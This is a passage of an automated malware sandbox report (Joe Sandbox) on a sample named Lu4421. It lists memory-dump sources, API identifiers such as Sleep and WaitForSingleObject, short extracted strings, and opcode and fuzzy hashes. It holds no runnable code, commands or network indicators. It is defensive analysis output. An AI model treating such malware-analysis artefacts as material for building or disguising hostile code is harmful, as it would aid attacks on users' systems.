                                                                                  • Associated: 00000000.00000002.2040975054.0000000001274000.00000040.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.2041986575.0000000001474000.00000040.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_b50000_Lu4421.jbxd
                                                                                  Similarity
                                                                                  • API ID: SleepTimetime
                                                                                  • String ID:
                                                                                  • API String ID: 346578373-0

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2040975054.0000000000EEA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2040847268.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.2040906535.0000000000EE6000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.2040926513.0000000000EE8000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.2040975054.0000000001265000.00000040.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.2040975054.0000000001274000.00000040.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.2041986575.0000000001474000.00000040.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_b50000_Lu4421.jbxd
                                                                                  Similarity
                                                                                  • API ID: SleepTimetime
                                                                                  • String ID:
                                                                                  • API String ID: 346578373-0

                                                                                  Control-flow Graph

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2040975054.0000000000EEA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2040847268.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.2040906535.0000000000EE6000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.2040926513.0000000000EE8000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.2040975054.0000000001265000.00000040.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.2040975054.0000000001274000.00000040.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.2041986575.0000000001474000.00000040.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_b50000_Lu4421.jbxd
                                                                                  Similarity
                                                                                  • API ID: ObjectSingleSleepWait
                                                                                  • String ID:
                                                                                  • API String ID: 309074506-0

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2040975054.0000000000EEA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2040847268.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.2040906535.0000000000EE6000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.2040926513.0000000000EE8000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.2040975054.0000000001265000.00000040.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.2040975054.0000000001274000.00000040.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.2041986575.0000000001474000.00000040.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_b50000_Lu4421.jbxd
                                                                                  Similarity
                                                                                  • API ID: ObjectSingleSleepWait
                                                                                  • String ID:
                                                                                  • API String ID: 309074506-0

                                                                                  Control-flow Graph

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2049539614.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_Lu4421.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: _+t$ _+t
                                                                                  • API String ID: 0-1736200941
                                                                                  • Opcode ID: 40e1331d58851c35f80f2bf057de1fa6996b2911aef9792afc5280b27f942f67
                                                                                  • Instruction ID: 0bf8bd9c9e237c0a2882aa25070ae203e12a1505b5fee2ffe3e8b6fb12d5a62a
                                                                                  • Opcode Fuzzy Hash: 40e1331d58851c35f80f2bf057de1fa6996b2911aef9792afc5280b27f942f67
                                                                                  • Instruction Fuzzy Hash: 18514931A0E78E4FD756EBB488655EA7FF0EF42210B0501FAD849DB0E2DE2C6945C791

                                                                                  Control-flow Graph

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2049539614.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_Lu4421.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: @\+t$P_+t
                                                                                  • API String ID: 0-3736040502
                                                                                  • Opcode ID: 98e00ddf78f65682ddcda9e152bc1830caa20438758b4ce8e47162271f03386e
                                                                                  • Instruction ID: eeff4690dc584181f9d252b57a1176321760cd6011f7a9df78fe2fdd67043efd
                                                                                  • Opcode Fuzzy Hash: 98e00ddf78f65682ddcda9e152bc1830caa20438758b4ce8e47162271f03386e
                                                                                  • Instruction Fuzzy Hash: 6441E251B4E7CA4FE7669BB818311B57FA1DF87224B1A02FAD099CB1F7D80D1906C386

                                                                                  Control-flow Graph (figure in the original report: basic-block graph from 7ffd9b7f3bf8 to 7ffd9b7f3d8a; legend: Executed / Not Executed)
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2049539614.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_Lu4421.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: \+t$\+t
                                                                                  • API String ID: 0-2059362047
                                                                                  • Opcode ID: de53dfbcff579e8eb02cb44fbef7ca9c74a7c481fbc7fee210a372a6637c6f73
                                                                                  • Instruction ID: caa62e269fd1d7d61ec1ef9b5a34febe0d5f92802296f5c4cb3092f2a948220d
                                                                                  • Opcode Fuzzy Hash: de53dfbcff579e8eb02cb44fbef7ca9c74a7c481fbc7fee210a372a6637c6f73
                                                                                  • Instruction Fuzzy Hash: 8F412630A0E78D4FD762A7B448255AA7FE0EF46220F5601FAD499CB1E3DE2C6806C752

                                                                                  Control-flow Graph (figure in the original report: basic-block graph from 7ffd9b7f3b18 to 7ffd9b7f3bd5, with a call to 7ffd9b7f2660; legend: Executed / Not Executed)
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2049539614.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_Lu4421.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: p\+t$x\+t
                                                                                  • API String ID: 0-2539556204
                                                                                  • Opcode ID: b9da49d2008321f39e573424b3e32efa5dcebcfb057ca26c7d0135689ca7b5db
                                                                                  • Instruction ID: 340a849a6211061adc18ea29e1abc1384d6daf61b7150f43ce42ff64da1b5a3f
                                                                                  • Opcode Fuzzy Hash: b9da49d2008321f39e573424b3e32efa5dcebcfb057ca26c7d0135689ca7b5db
                                                                                  • Instruction Fuzzy Hash: D1216631A0968D4FD746EBA498399E8BFE0EF55220F0602FBD459C70B2EA2825848791
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2049539614.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_Lu4421.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: `\+t$h\+t
                                                                                  • API String ID: 0-1804048514
                                                                                  • Opcode ID: aebee94842be331bddb517eee1459c9eea299dd5a73ad85e9c99563830696564
                                                                                  • Instruction ID: c9725f52011628fe1f01d55b36655c86faead7b61f878c08c00913fd4c01915e
                                                                                  • Opcode Fuzzy Hash: aebee94842be331bddb517eee1459c9eea299dd5a73ad85e9c99563830696564
                                                                                  • Instruction Fuzzy Hash: 24012420B0A60D4FE7559BA844645F87BE1FF15320B0202FAD858EB1F2EE1C2941C365
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2049539614.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_Lu4421.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: H_+t$P_+t
                                                                                  • API String ID: 0-3958952397
                                                                                  • Opcode ID: c8bd693f8d1676c927ec4cc317a91a38da899a9b76102981e7dafe2cf1274626
                                                                                  • Instruction ID: df6d8d800e74cdc07c829ac803a00e6a71f662d620d2a9853ce61de2cd82032e
                                                                                  • Opcode Fuzzy Hash: c8bd693f8d1676c927ec4cc317a91a38da899a9b76102981e7dafe2cf1274626
                                                                                  • Instruction Fuzzy Hash: 16E092617CA58A8FE701165CA8615E8F390EF92238F8500F6C4498F0D5D98D68879252
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2049539614.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_Lu4421.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: p\+t
                                                                                  • API String ID: 0-247848984
                                                                                  • Opcode ID: 81f765d8edd850a56b053be6fd8ad4dbf06185aa4166cf9e7bd63ca0788abffc
                                                                                  • Instruction ID: 8d2d30da40e5334bcf6b7d7c0f401ed5021a46f5e69628c000d7e06dfc0d74c2
                                                                                  • Opcode Fuzzy Hash: 81f765d8edd850a56b053be6fd8ad4dbf06185aa4166cf9e7bd63ca0788abffc
                                                                                  • Instruction Fuzzy Hash: 4D713D70B1990C9FDF94EB6CD499EA97BF1EFA9310B0541A9E00DD72A2DA24EC41CB40
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2049539614.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_Lu4421.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: p\+t
                                                                                  • API String ID: 0-247848984
                                                                                  • Opcode ID: 262bb9079f98ac7a513ed33a91b253821a43f24f7ee646f9ae25da5d0182e8ac
                                                                                  • Instruction ID: f0445586d96aa07d2cb24451a9f3ed2ad470add44e42061dc53506d5a9170535
                                                                                  • Opcode Fuzzy Hash: 262bb9079f98ac7a513ed33a91b253821a43f24f7ee646f9ae25da5d0182e8ac
                                                                                  • Instruction Fuzzy Hash: D6711B70B1990C9FDF94EB6CD499EAD7BF2EFA8311B0501A9E009D72A1DA64EC41CB40
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2049539614.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_Lu4421.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: x6+t
                                                                                  • API String ID: 0-2385610241
                                                                                  • Opcode ID: 3a97861784ae8f8e586227a452864d8d28389bd93ec5d0f87596a3fcadc37296
                                                                                  • Instruction ID: 8d2684f8a8028f1a2f1f0493cf6923c005a7489ab562693cb5777b64bef80be2
                                                                                  • Opcode Fuzzy Hash: 3a97861784ae8f8e586227a452864d8d28389bd93ec5d0f87596a3fcadc37296
                                                                                  • Instruction Fuzzy Hash: 2B811A71B0AA4E4FEB51EBB484655F97BE1EF59310B2101B9C44ACB1B7DE2CA942C740
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2049539614.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_Lu4421.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Z+t
                                                                                  • API String ID: 0-1802297948
                                                                                  • Opcode ID: 5c92a36e7bc2faf30be48317944db255d391478b687ea18faa831838fe129c0b
                                                                                  • Instruction ID: 0426fe5e53308b0fc4c9c6f344be30273eea2d2ce030028e8fd21a05e4168605
                                                                                  • Opcode Fuzzy Hash: 5c92a36e7bc2faf30be48317944db255d391478b687ea18faa831838fe129c0b
                                                                                  • Instruction Fuzzy Hash: D541A430B18A4E8FDB95DF18C464BEA77E2FF98350F5844A9D45AC7296CE34E842CB41
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2049539614.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_Lu4421.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 8\+t
                                                                                  • API String ID: 0-1348833482
                                                                                  • Opcode ID: 2b16228fec03769167f6749f19e2f3a2cdf4f4d3b2d8305745a290858414aa1e
                                                                                  • Instruction ID: 28e3002d5441d32c233981ae664f6416f2782067e8d0c5356d544afcc1f63fb7
                                                                                  • Opcode Fuzzy Hash: 2b16228fec03769167f6749f19e2f3a2cdf4f4d3b2d8305745a290858414aa1e
                                                                                  • Instruction Fuzzy Hash: 3E21832194E3CA1FD7539BB49C24AD67FF4DF47224B0A02EBD085CB0A3C55C4996C762
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2049539614.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_Lu4421.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: _+t
                                                                                  • API String ID: 0-3347993059
                                                                                  • Opcode ID: 5e3062cc7cebbc38c6ddd044eb90424e630688866f6f5d56a414e844d6d0f044
                                                                                  • Instruction ID: e6ccd87a7a9d85dce51f11855ce2ca8359be7fad708982c2faa3d188b83d1091
                                                                                  • Opcode Fuzzy Hash: 5e3062cc7cebbc38c6ddd044eb90424e630688866f6f5d56a414e844d6d0f044
                                                                                  • Instruction Fuzzy Hash: 32212530A0A34E4FD796EBB484666E97BE0EF02264B4105FAD849DB0A6DA2C5984C391
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2049539614.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_Lu4421.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: @\+t
                                                                                  • API String ID: 0-4277016761
                                                                                  • Opcode ID: 989ed15be465fe7fefd3b55b2449a6c5b5d5d1e1533d3f000e434193fee60eb0
                                                                                  • Instruction ID: d300378d06c24b24f48dc804a00a96214c5747bdcee76bb1ad885427c9ffe355
                                                                                  • Opcode Fuzzy Hash: 989ed15be465fe7fefd3b55b2449a6c5b5d5d1e1533d3f000e434193fee60eb0
                                                                                  • Instruction Fuzzy Hash: E311E912B1EB8D0FE7A59B7C04752A83E92EFC5250B4A02BED04DCB2F7DD095E054395
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2049539614.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_Lu4421.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: @\+t
                                                                                  • API String ID: 0-4277016761
                                                                                  • Opcode ID: fb006de72770f48d27fe98a72e8ca5483c0dd50745c226a8231b908f8fe0cb09
                                                                                  • Instruction ID: 59ce4ba5fae66285126dc4d4ba4f1c2c9c2fc780940b7076a94b7fa78ca644c8
                                                                                  • Opcode Fuzzy Hash: fb006de72770f48d27fe98a72e8ca5483c0dd50745c226a8231b908f8fe0cb09
                                                                                  • Instruction Fuzzy Hash: 0D11C611B1EA4D0FE7A9AA7C04256A92A92EFC5350B4503BED44EC72F6DD095D0243D5
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2049539614.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_Lu4421.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: P_+t
                                                                                  • API String ID: 0-2897342847
                                                                                  • Opcode ID: ced92cc5edad86fa01bbf0eccff189156ab93f58c5bd5d6cdf2b70648defec15
                                                                                  • Instruction ID: ca71d65ec0d5fa6ce2e78c88fcb4c1791d31107788fd16a043abdc4eaf794967
                                                                                  • Opcode Fuzzy Hash: ced92cc5edad86fa01bbf0eccff189156ab93f58c5bd5d6cdf2b70648defec15
                                                                                  • Instruction Fuzzy Hash: 1CF0BB20F1AA9E0FE765BBB828611BC79D1EF85324B4501FAD41DC72EADC1C5D8643C6
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2049539614.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_Lu4421.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Z+t
                                                                                  • API String ID: 0-1802297948
                                                                                  • Opcode ID: 8243099e6f99bac6c8ee5c64cff698c8850360205d5ea30727e46d0750022d13
                                                                                  • Instruction ID: 39477c613efd0557f07dc638821f9d646a1a2ea2a2c7289f8d95b5f9ef07f253
                                                                                  • Opcode Fuzzy Hash: 8243099e6f99bac6c8ee5c64cff698c8850360205d5ea30727e46d0750022d13
                                                                                  • Instruction Fuzzy Hash: 48D0A9A208BB822FD3438A6898D00E0BBC0EE0213436508DDC4C3AF0B2E10DADDBC311
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2049539614.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_Lu4421.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: H\+t
                                                                                  • API String ID: 0-995766358
                                                                                  • Opcode ID: 247a59f0abc534f3fff3f3675483c52d17f5b23f97182a61a1cd1617902e852b
                                                                                  • Instruction ID: 87167e28ab744cc2c18dd8989f019a6b9602f39e990227da3a13cf685bc63b28
                                                                                  • Opcode Fuzzy Hash: 247a59f0abc534f3fff3f3675483c52d17f5b23f97182a61a1cd1617902e852b
                                                                                  • Instruction Fuzzy Hash: 8DC08052187B559FD676C4A80C555A52FC4EE1257076502D49CA5DF5E1F50C584381C8
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2049539614.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_Lu4421.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: c541fa5fc5f6f4bd0fe0fa64eaf9ab70cbd3f903f9b867a6ad87d041482b63fb
                                                                                  • Instruction ID: ed7cf6a1e3ea27be77f3c95a50d8d5d109dce3a670e17056c13549a133037e5d
                                                                                  • Opcode Fuzzy Hash: c541fa5fc5f6f4bd0fe0fa64eaf9ab70cbd3f903f9b867a6ad87d041482b63fb
                                                                                  • Instruction Fuzzy Hash: A7212570A0D68A5FE752EBB448695EDBFE0EF06200B0405BED848DB1E7DE2C5841C795
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2049539614.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_Lu4421.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 6a1f183256b5113751945cd55465ae3286c1f3c2d186e4b338f648e618052edb
                                                                                  • Instruction ID: 3b02656b23a9b46a4bfd56c1fe879b7dd8482664d67858d046f455b2926375cc
                                                                                  • Opcode Fuzzy Hash: 6a1f183256b5113751945cd55465ae3286c1f3c2d186e4b338f648e618052edb
                                                                                  • Instruction Fuzzy Hash: 0111D032F4EA5E09F7B4A2B408216FD79D0EF883A0F520775D42DC24F6DD192A1A05CA
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2049539614.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_Lu4421.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 2b2c0c562da91cb05f595bf0078e2722deb473eb68b831ea98ee72dd84277a80
                                                                                  • Instruction ID: c046bd26dff56af494bb79cda126f5c7f2d3a00d6e5b5990a7a6b0c3172b2b5a
                                                                                  • Opcode Fuzzy Hash: 2b2c0c562da91cb05f595bf0078e2722deb473eb68b831ea98ee72dd84277a80
                                                                                  • Instruction Fuzzy Hash: AC110A32B1E7CD0BD725967458254D67FA1EF91324F4907BFD085870F6EC18660583C2
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2049539614.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_Lu4421.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 16dcfba0eb4754e5c1095dcd965eb79d927ba3393ce8d3d3eb2a4bd4b49ccac8
                                                                                  • Instruction ID: 6d92799e2fd64e6839628285274dd368b279881889f1db098f7f06cc1c695c1e
                                                                                  • Opcode Fuzzy Hash: 16dcfba0eb4754e5c1095dcd965eb79d927ba3393ce8d3d3eb2a4bd4b49ccac8
                                                                                  • Instruction Fuzzy Hash: C001493230C6054FEB40EB68E4554F977D0EF5933572504BAC549DB062EA2AFC528744
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2049539614.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_Lu4421.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 925dcd2f175fdb9798d4fdcb76b7325ecf282e1d7ddac6656ded65be94ce9119
                                                                                  • Instruction ID: 3d6b847b8d95600f6aa158a39f3134c26508ca73dfc0d4c6cac6989ef596c9ea
                                                                                  • Opcode Fuzzy Hash: 925dcd2f175fdb9798d4fdcb76b7325ecf282e1d7ddac6656ded65be94ce9119
                                                                                  • Instruction Fuzzy Hash: 22110627A0D2DD4FD712AB646C654F87F60EF4221C74A02FBD0988B1A3EC182619C7D5
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2049539614.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_Lu4421.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 060c14803503acbb49ddb24730517020724ac22c8a16cc34023c52b6a693c832
                                                                                  • Instruction ID: 3ed5786b427a2f000d8044856a7069f9f354a3e4e9afb4044a9733b6dffd6986
                                                                                  • Opcode Fuzzy Hash: 060c14803503acbb49ddb24730517020724ac22c8a16cc34023c52b6a693c832
                                                                                  • Instruction Fuzzy Hash: AD114832B1E7CE0FD725967458248E67F91EF92260F4907BEE089C71F6EC14660983C2
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2049539614.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_Lu4421.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: d7ae9fd3ad586e9bfd21175e0ecce8ff9ae400db90db4f977064144579bc353b
                                                                                  • Instruction ID: a130ab47781adf7a0b1fea343bdf832f03f75c51c81e56a94e46f78400b971bf
                                                                                  • Opcode Fuzzy Hash: d7ae9fd3ad586e9bfd21175e0ecce8ff9ae400db90db4f977064144579bc353b
                                                                                  • Instruction Fuzzy Hash: 64010831B0AA4D4FDBA167B440252EABBA1DF09251F1105B6C80CDB0F2DE2D6980C395
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2049539614.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_Lu4421.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: d0d9dfbc8a4a1a491fd80022bfe56f2b1d57c629197785c8064c560188276f7d
                                                                                  • Instruction ID: d5c90229d6dee466c62b3ab6b06ced4013c572f9b6755eee334f99cb80ced5d2
                                                                                  • Opcode Fuzzy Hash: d0d9dfbc8a4a1a491fd80022bfe56f2b1d57c629197785c8064c560188276f7d
                                                                                  • Instruction Fuzzy Hash: 30F0822291F3CD4FDB135A745CA10A53F70AF03604B0A42F7E4989A1F3D9186A54C3A2
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2049539614.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_Lu4421.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 16e36ee299983a05976155cdff3e5e81ee31c65416c3af5671ccad08cda919ca
                                                                                  • Instruction ID: a3de84705cb311c43ddca9a70b95c1e1831a5416821345c52641f602143d8342
                                                                                  • Opcode Fuzzy Hash: 16e36ee299983a05976155cdff3e5e81ee31c65416c3af5671ccad08cda919ca
                                                                                  • Instruction Fuzzy Hash: 9CE0C225F4980E09EB04B7B4283A9FDB255EFC4214FC20876E02DC30DBCC1D26110181
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2049539614.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_Lu4421.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: ef831f3d305bdca6e588f5f2632e53e9437bbe3be5ec3ca75e6d7b4d3e0fec51
                                                                                  • Instruction ID: a6ad9841ff798eaba6f65657bb6d5dea6a4076da0f1fcb32de96321ce589984a
                                                                                  • Opcode Fuzzy Hash: ef831f3d305bdca6e588f5f2632e53e9437bbe3be5ec3ca75e6d7b4d3e0fec51
                                                                                  • Instruction Fuzzy Hash: 15E09210E0E6854FE796D7B48C66B687BD0AF43204F8942E6E04CCA1E7CA5C5A50C752
                                                                                  Memory Dump Source
